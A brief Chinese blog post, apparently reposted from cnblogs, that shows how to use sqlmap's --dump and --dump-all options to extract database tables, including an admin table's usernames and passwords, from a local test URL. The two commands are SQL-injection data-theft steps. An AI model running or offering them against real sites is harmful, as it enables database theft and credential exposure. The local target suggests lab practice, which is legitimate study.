码迷,mamicode.com
首页 > 数据库 > 详细

SQLMAP脱裤

时间:2016-12-20 01:36:52      阅读:305      评论:0      收藏:0      [点我收藏+]

标签:span   inject   ima   alt   文件   code   index.php   dump   哥们儿   

之前就有一个朋友问,咋使用sqlmap脱裤。然后我丢了一个参数给他,他好像懵逼懵逼的。今天又有一个哥们儿在群里问,行吧。就直接教一下。

其实很简单。

--dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"

技术分享

脱出数据如下所示:

技术分享技术分享

仅一个文件。就是你选定了的数据。

那么我们加all呢?(PS:此时可以把那些字段都给去掉。)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all

 可见如下是三个文件。

技术分享

这三个文件是啥呢?解惑便是下图所示。 

 技术分享

 

SQLMAP脱裤

标签:span   inject   ima   alt   文件   code   index.php   dump   哥们儿   

原文地址:http://www.cnblogs.com/xishaonian/p/6201038.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!